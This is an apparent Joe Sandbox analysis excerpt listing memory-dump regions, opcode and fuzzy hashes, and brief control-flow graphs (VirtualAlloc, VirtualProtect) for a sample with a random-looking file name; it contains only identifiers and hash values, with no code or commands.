                                        • API String ID:
                                        • Opcode ID: 9a1bf21e11704b02d20ada0dfecd2dea7e0ca1d1a7926485ceb57692e39bd621
                                        • Instruction ID: 95471d950da8e2f02817b5a6fa86664d4cef705f9f23cbe93f18f716f8ab8906
                                        • Opcode Fuzzy Hash: 9a1bf21e11704b02d20ada0dfecd2dea7e0ca1d1a7926485ceb57692e39bd621
                                        • Instruction Fuzzy Hash: A5014C30909A8D8FCB45EF68C869A997FF0FF69301F0541AAE448C71A2D734DA94CB81
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1980a0a7fd99a3149cd6ac2c1a57cd2eed928b30b30a05942a6676f3c4462413
                                        • Instruction ID: 80671b84a182b161bb61e5f5312a48efe5d1c564fbc3ad4e75fe9e18faae0052
                                        • Opcode Fuzzy Hash: 1980a0a7fd99a3149cd6ac2c1a57cd2eed928b30b30a05942a6676f3c4462413
                                        • Instruction Fuzzy Hash: 6401F570A0E28E8FE722AFA4C8642E97B71EF06314F0506B7D059DB1E3CA786614C755
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f5a1cd6741baf29cd2ad6447a5a2096a018e42bb611c64fb7ebbacd3c0cb6ca3
                                        • Instruction ID: b877d3fcaf17015737449bfb2d428c703ab08d672ba207775b79e00ef95755f0
                                        • Opcode Fuzzy Hash: f5a1cd6741baf29cd2ad6447a5a2096a018e42bb611c64fb7ebbacd3c0cb6ca3
                                        • Instruction Fuzzy Hash: 4601C870914A4D8FDF84EFA8C859AAA77F0FB68305F00066AA81DD3260DB30A594CB80
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7dfe66e7c0878bef05b8db48bcfef8776483e1859d3ecd93672e659aebe9d4b0
                                        • Instruction ID: 7a994e18273ffd4f7be9696446791a6b24acbf3d7012f421ea6779862f0737f6
                                        • Opcode Fuzzy Hash: 7dfe66e7c0878bef05b8db48bcfef8776483e1859d3ecd93672e659aebe9d4b0
                                        • Instruction Fuzzy Hash: 4A01A870914A4D9FDF84EF58C849AEEBBF0FB68305F00456AA81DD3260DB70A694CB81
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1957519459.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bc60000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07a3d7aec4f48b13986887033b047d836ed580c5c82a3d5ec045cdb68667f150
                                        • Instruction ID: c8c28e509c28416f7ee13c406b2d65d010ae38ceb677e3303585ef4c3c4e3117
                                        • Opcode Fuzzy Hash: 07a3d7aec4f48b13986887033b047d836ed580c5c82a3d5ec045cdb68667f150
                                        • Instruction Fuzzy Hash: F7018F3090968D8FCB95DF64C894AD97FB0FF19300F0501AAD408C71A1CB359995CB81
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 22cc5091b5c98812d44b74f131fecb24d62339a1d29cb3af64b31867518324a9
                                        • Instruction ID: 899b02b14d91f4c034019bfe1acbab8338c66292e8b3f6f921bb68cb37539fdd
                                        • Opcode Fuzzy Hash: 22cc5091b5c98812d44b74f131fecb24d62339a1d29cb3af64b31867518324a9

                                        Execution Graph

                                        Execution Coverage:3%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:7
                                        Total number of Limit Nodes:1
                                        execution_graph 32551 7ffd9bab3b4d 32552 7ffd9bab3b22 32551->32552 32553 7ffd9bab3b6b VirtualAlloc 32551->32553 32555 7ffd9bab3c85 32553->32555 32547 7ffd9bab215e 32548 7ffd9bab216d VirtualProtect 32547->32548 32550 7ffd9bab22ad 32548->32550

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,$4
                                        • API String ID: 0-508195717
                                        • Opcode ID: e9deec8f62224b5fb4068c3b18619f89e62dc275523ed66dca92879e2a2cd963
                                        • Instruction ID: 4f9a6e8c7e2810e1f4e3bffda6463aac06dad706be1ba5ba3e131143e9580b5a
                                        • Opcode Fuzzy Hash: e9deec8f62224b5fb4068c3b18619f89e62dc275523ed66dca92879e2a2cd963
                                        • Instruction Fuzzy Hash: CC415B70A0964DCFDB68DF94C8A4BE9B7F1EF59310F5141AAC40AD72A1CB74AA85CF00

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: f2856c50b7b0fb23cbde0c80ba66f885df0633b5ab1c28ea3b7459df6d93f98d
                                        • Instruction ID: 66a580252f5c7d65c1cc8233889c404f0db93ef199ae1e2ae9c313564a379aa4
                                        • Opcode Fuzzy Hash: f2856c50b7b0fb23cbde0c80ba66f885df0633b5ab1c28ea3b7459df6d93f98d
                                        • Instruction Fuzzy Hash: 4BD10631B19E4E4FDBA8DB5C98A4AF577E2FF98350B0502BAD44DC7296DE24EC458340

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 398 7ffd9bab215e-7ffd9bab216b 399 7ffd9bab2176-7ffd9bab2187 398->399 400 7ffd9bab216d-7ffd9bab2175 398->400 401 7ffd9bab2189-7ffd9bab2191 399->401 402 7ffd9bab2192-7ffd9bab22ab VirtualProtect 399->402 400->399 401->402 407 7ffd9bab22ad 402->407 408 7ffd9bab22b3-7ffd9bab2303 402->408 407->408
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAAB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baab000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: a5e1f5290be3bf6a5e90ab962f78431ddc96f6343e1ad74f1f6f7a167a74393c
                                        • Instruction ID: a3a8d8865e590d5d3471f2f92529e77cfd9e00168a56ab10e557507077b19d1c
                                        • Opcode Fuzzy Hash: a5e1f5290be3bf6a5e90ab962f78431ddc96f6343e1ad74f1f6f7a167a74393c
                                        • Instruction Fuzzy Hash: 87517D70D0874D8FDB54DFA8D845AEDBBF1FB6A310F1042AAD048E7256DB74A885CB81

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W
                                        • API String ID: 0-655174618
                                        • Opcode ID: afdd5343bc8a5c75bc8aaefee34eb70da4c605301d62b251783cdaf327bb898f
                                        • Instruction ID: f33fcc34a07a90a1c13e4f33019a61a820a249ae894cb647d78fdb251e3a2867
                                        • Opcode Fuzzy Hash: afdd5343bc8a5c75bc8aaefee34eb70da4c605301d62b251783cdaf327bb898f
                                        • Instruction Fuzzy Hash: 9AC13832B0EB8D4FDB64DB6898751ED7FE1EF99314F0901BAD088D72A3EE2859018351

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 475 7ffd9bab3b4d-7ffd9bab3b69 476 7ffd9bab3b6b-7ffd9bab3c83 VirtualAlloc 475->476 477 7ffd9bab3b22-7ffd9bab3b4a 475->477 483 7ffd9bab3c85 476->483 484 7ffd9bab3c8b-7ffd9bab3cef 476->484 483->484
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAAB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAB000, based on PE: false
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e20c0a6e458dafcf4a29f8bdf750e7d329a0da42d23e05be75b66ff9cb6d043
                                        • Instruction ID: 382f6df0eb8c1ed649771cc26a1289223704b815976b0103f1a16457d8717465
                                        • Opcode Fuzzy Hash: 8e20c0a6e458dafcf4a29f8bdf750e7d329a0da42d23e05be75b66ff9cb6d043
                                        • Instruction Fuzzy Hash: 74110675A0E28D8FE722AFA4C8242E97B71EF42310F0545B7D059DB1E3CA782619C765
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d2776f701722347d0fdeba2cfa2e518cf1c9f60d1ccb8f0bdb12c1fe3a094d4
                                        • Instruction ID: 34cf2bfe88c2e31b634e772e7e34a3eedeb032a89117e99d1274a25218381205
                                        • Opcode Fuzzy Hash: 7d2776f701722347d0fdeba2cfa2e518cf1c9f60d1ccb8f0bdb12c1fe3a094d4
                                        • Instruction Fuzzy Hash: EA217730A0561D8FDBA4EB54C894BE9BBB1FB58300F5545AAC40DE72A1DF746AC5CB40
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9babb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a7981162a550c084d3c10833ea54958592ece977f1c565fcddf918992cc55cb1
                                        • Instruction ID: 04a10f8522df26a4a0edbc87cf2710e2b7ffeac90c6bca5c5026bffea899ee9c
                                        • Opcode Fuzzy Hash: a7981162a550c084d3c10833ea54958592ece977f1c565fcddf918992cc55cb1
                                        • Instruction Fuzzy Hash: 5F114C3090968D8FCF45EF68C8589EA7FF0FF69304F0145AAE448D71A1D7349554CB81
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f36060e4bafa2a910a3276a36576f24af063f24fc0fd9249717d2669a2fd7251
                                        • Instruction ID: 7757d9ab80c08968aca261585bdc67d54eee35fb7da00e2d92fd7ca9bb3a1b6a
                                        • Opcode Fuzzy Hash: f36060e4bafa2a910a3276a36576f24af063f24fc0fd9249717d2669a2fd7251
                                        • Instruction Fuzzy Hash: 6A11C970914A4D8FDF84EF58C859AEE7BF1FB68305F10052AE859D3250DB71E590CB81
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5958cad5d317b9cd8fc8adf3ea20f2b3497557485cff78e9914ac0ab4b9a4aa9
                                        • Instruction ID: bb392b33b2ca6655293be89054e79f88c2351cf5df8c3b58a6921a48bb182f04
                                        • Opcode Fuzzy Hash: 5958cad5d317b9cd8fc8adf3ea20f2b3497557485cff78e9914ac0ab4b9a4aa9
                                        • Instruction Fuzzy Hash: 85014932E0E68D4FE7509B58D8651FCBBE0EF45324F420176D51C831D6CE781249CB41
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2024714342.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bc60000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e9e1d1a819d4ef12541721636eab73a391e5170f0091df878b71399b2a03fa64
                                        • Instruction ID: 012dd4ff5e4a35c8090618f6359d72cd07f70128e37f7b5d388d28dfe40c08c8
                                        • Opcode Fuzzy Hash: e9e1d1a819d4ef12541721636eab73a391e5170f0091df878b71399b2a03fa64
                                        • Instruction Fuzzy Hash: D9118E3090968DCFCB85DF68C8549EE7BF0FF29300F0505AAE859C71A1DB34AA54CB81
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bad8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d0e431de01890397017ee19ece007832f3cd7d9982f19d8c82ca2855dc724cce
                                        • Instruction ID: 9f446e39fdfaa80309356083e178b90d4332ec29e9c151ed5de5a7710b825657
                                        • Opcode Fuzzy Hash: d0e431de01890397017ee19ece007832f3cd7d9982f19d8c82ca2855dc724cce
                                        • Instruction Fuzzy Hash: F8115E7090864D8FCF85EF68C858AE97BF0FF29300F0101AAE819C7261DB34D554CB80
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12c38b985b429c6daf98fa0f4ceae376d2a983f29146f9b33e278f7612e2757e
                                        • Instruction ID: d66c017137cb2ed2f79dbf18e3eafa338637a8be7c3d3bb2deea79a994ac6ef7
                                        • Opcode Fuzzy Hash: 12c38b985b429c6daf98fa0f4ceae376d2a983f29146f9b33e278f7612e2757e
                                        • Instruction Fuzzy Hash: 10117C3090868D8FCF45EF68C898AEA7BF0FF29301F01019AE859D32A1DB349554CB80
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2024714342.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bc60000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6a71ef7cebc0dfeb6379f642d9414abf3bfeeb23122290071ea376542c0e9c05
                                        • Instruction ID: 99b00c5e02e9654e596f80588ffcdf035b6edbc88f81a6bac0f9bea9410fb0ab
                                        • Opcode Fuzzy Hash: 6a71ef7cebc0dfeb6379f642d9414abf3bfeeb23122290071ea376542c0e9c05
                                        • Instruction Fuzzy Hash: 1C01803090968D8FCB45DF68C8959D97FF0FF59300F0501AAE849C71A2CB34A985CB41
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f2ad1706d985c47a7df0d64dabf5cc478622759b23891739ae58cb0929c073e
                                        • Instruction ID: 315c097a4f75fff5bfe9d8d2f220e25526cdf32de8bda9a5366b24255bd78c00
                                        • Opcode Fuzzy Hash: 5f2ad1706d985c47a7df0d64dabf5cc478622759b23891739ae58cb0929c073e
                                        • Instruction Fuzzy Hash: DE010471A1968C8FCB85EF18C891AD93BF0FF69304F0601A6E859C7261D734E950CB81
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bad8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3be793a8d012cce68fcebe93f7df3fb42dfc36439770b6d0e418e5d4ec2e8d39
                                        • Instruction ID: b3dd37f457a6cac966829f7078135d427ef9942756f38c68dfccc8af2539ef03
                                        • Opcode Fuzzy Hash: 3be793a8d012cce68fcebe93f7df3fb42dfc36439770b6d0e418e5d4ec2e8d39
                                        • Instruction Fuzzy Hash: 2A11093090864D8FCF85EF68C899AEE7BF0FF68304F0505AAE459D7261DB34A594CB81
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5beb3102a550ff38c0d2008b1e3dbb9ab970d12f301d030a682edbcc99b0596e
                                        • Instruction ID: 1a775d8de43b56db0cc6cdfd184db301b4b3447e182fcf15debb0a6abdf3cfd3
                                        • Opcode Fuzzy Hash: 5beb3102a550ff38c0d2008b1e3dbb9ab970d12f301d030a682edbcc99b0596e
                                        • Instruction Fuzzy Hash: 91110471A0E28E8FE722AFA4C8242E97B71EF42310F0545B7D059DB1E3CA786614C7A5
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAFF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFF000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baff000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 312121890d372c5ccd231f5607fa6bc0e0c843ddb46181f77d6a46ddc063cafb
                                        • Instruction ID: 3488bd27aae3cc886d663c1548da054a2d10456bc10bd8294b2466ff2b8277de
                                        • Opcode Fuzzy Hash: 312121890d372c5ccd231f5607fa6bc0e0c843ddb46181f77d6a46ddc063cafb
                                        • Instruction Fuzzy Hash: 3401C570918A4D8FDF84EF58C899AE97BF0FF68305F10056AE859D32A0DB70E590CB81
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 03bb3903d18fe87328158500ac1048efd4b47ac67926e72e847273b7aca3b5b7
                                        • Instruction ID: a7cc9cd158846ef0fbb09ca01bfbaebca5ef3ab211b96b93a2ce5356579f5697
                                        • Opcode Fuzzy Hash: 03bb3903d18fe87328158500ac1048efd4b47ac67926e72e847273b7aca3b5b7
                                        • Instruction Fuzzy Hash: A501527090964D8FCF85EF68C858AAA7BF0FF25301F05059BE418C71A2D7309994CB81
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2024714342.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bc60000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e9aa0149257a9bc20163c8d8dc4794f73933bce77289f41495569250880d85d9
                                        • Instruction ID: 9686d78076a1bad6eb34a55e7550735221be3c4fb9f160cae99affb0203806b7
                                        • Opcode Fuzzy Hash: e9aa0149257a9bc20163c8d8dc4794f73933bce77289f41495569250880d85d9
                                        • Instruction Fuzzy Hash: 1F014C30909A4D8FCF85EF68C858AAE7BF0FF69301F05019BE419C72A1DB349994CB41
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2ce1ddec1f5baebad8494477bbe33113823e1c17048d16b81c01cc3d7474da8
                                        • Instruction ID: c8281d44d0831170cf3d4ddda8a61fef996290fc6003c5798d0f3d07a778c7f1
                                        • Opcode Fuzzy Hash: c2ce1ddec1f5baebad8494477bbe33113823e1c17048d16b81c01cc3d7474da8
                                        • Instruction Fuzzy Hash: F3014C3090968C8FCF45EF28C865AD97FF0FF29304F0541AAE849C71A1DB34A994CB81
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bad8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5d37f03a5e7c564f5fb253e051c77001e7e4705df21948acfeda3a59a671bbbf
                                        • Instruction ID: 767b0ce3eb701bf9394cef0ac72f7d3ef76faa571e9d8ab7bf47ac3eb7800c2b
                                        • Opcode Fuzzy Hash: 5d37f03a5e7c564f5fb253e051c77001e7e4705df21948acfeda3a59a671bbbf
                                        • Instruction Fuzzy Hash: DF014C3090864D8FDF85EF68C898AEA7FF0FF69301F0101AAD418C72A1DB359594CB80
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bad8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 378bc818bf34ff70343b7b945e1469f6dfa4ca90887d4af3f671deb9c56f47ea
                                        • Instruction ID: 35b6df632ab1032e0bf52863f40a28202fddfc90b48e02af083aa4986e92e1e0
                                        • Opcode Fuzzy Hash: 378bc818bf34ff70343b7b945e1469f6dfa4ca90887d4af3f671deb9c56f47ea
                                        • Instruction Fuzzy Hash: 5E01293090868D8FCF85EF58C898AEA7BF0FF69300F0501AAD418D72A2DB359594CB80
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1ead953b071645b1151f068910fe84c5e072a0603b80ef9f7ce716514e357e2
                                        • Instruction ID: d233f4fa2f5c60f08b4e45fbea9e1ced2bed34d32b4b8a3b396425e6a77c2c0b
                                        • Opcode Fuzzy Hash: b1ead953b071645b1151f068910fe84c5e072a0603b80ef9f7ce716514e357e2
                                        • Instruction Fuzzy Hash: 0601403091968C8FCF45DF58C859AD97FF0FF69305F0501AAD449C71A2D7359954CB41
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2024714342.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bc60000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a1bf21e11704b02d20ada0dfecd2dea7e0ca1d1a7926485ceb57692e39bd621
                                        • Instruction ID: 95471d950da8e2f02817b5a6fa86664d4cef705f9f23cbe93f18f716f8ab8906
                                        • Opcode Fuzzy Hash: 9a1bf21e11704b02d20ada0dfecd2dea7e0ca1d1a7926485ceb57692e39bd621
                                        • Instruction Fuzzy Hash: A5014C30909A8D8FCB45EF68C869A997FF0FF69301F0541AAE448C71A2D734DA94CB81
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9babb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ec72d129cee2b352ed78a2c1322bf2a1127db656ed5544ca3ad82f9d8a7f39e
                                        • Instruction ID: 961820607eec178b68a6a878218dc74be692acf28955bbccd78da5663cb6f311
                                        • Opcode Fuzzy Hash: 9ec72d129cee2b352ed78a2c1322bf2a1127db656ed5544ca3ad82f9d8a7f39e
                                        • Instruction Fuzzy Hash: 1711B331A4952ECEEB70EB44C859BA9B3F1FB54311F0041E5C10DD76A1DB746A849F10
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 98de464c36605a1816f89f9768f5649bbb9cab732f7378f0398fb676417e07de
                                        • Instruction ID: b62c446e097d64005136d9f7cd5a41960a7a4dfa825e7b38708e99f0a4b86cfe
                                        • Opcode Fuzzy Hash: 98de464c36605a1816f89f9768f5649bbb9cab732f7378f0398fb676417e07de
                                        • Instruction Fuzzy Hash: 3901A870914A4D9FDF84EF68C849AEE7BF0FB68305F00456AA81DD3260DB71E594CB81
                                        Memory Dump Source
